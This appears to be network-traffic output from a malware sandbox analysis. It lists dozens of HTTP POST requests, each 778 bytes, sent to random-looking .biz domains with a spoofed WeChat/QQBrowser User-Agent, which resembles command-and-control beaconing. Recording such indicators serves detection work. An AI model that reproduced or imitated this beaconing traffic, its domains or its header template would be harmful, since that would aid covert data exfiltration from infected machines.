Source: global trafficHTTP traffic detected: POST /uswmbyvknw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /shm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /nxomllvrieoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ywkdmkysrijolmoj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ws HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yhrktnvbm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /mjmfrcmno HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /cxtfkubsyhri HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /tocvykftorkpni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /mmdfp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yhdmpa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /tjrtnokwwlpftv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /wfwpk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /arnrrfwlvkgxeufd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ckfgkmbjfmpkxgr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /dneetrunpbg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /euqwoqq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ibecst HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /mi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /nmaggyam HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /cmntnmriuw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /mrsvwgseskwgtc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /pyamvnfeng HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /txmgarlp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vbtgsklxqvsc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ckhsjhaxaevpxtd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /kjptih HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ttxmcyeqta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /xndhuecwgokoeqk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yyjnpedbcl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /jkvhfxewyayfhg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /sxtbjbwlxwcwo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /fvsaltcygk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /jfrndo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /akhgyldyrj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /wrdfsv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /eoefw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /mhxqli HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /boadhtoh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /aonsotl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ejfywbwbdmnosnl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /inujhuaraisu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ahomqbxdjyyc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /fcekfjqtslvl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ltqh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /pmpevwipwdmvqi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /qbtfbn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /qbvqktfxqsysi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /bbx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /lpoac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /jlqmlud HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ogfkakv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yefjfs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /kwcvpyammkduugr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /xodwswpgarjchsqy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /wyrwafauw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /lufcjqrc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /hfjkd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /dpop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /awkwgthegytbtgpc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /gcp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /aucs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yvsxvdpyb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /iq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
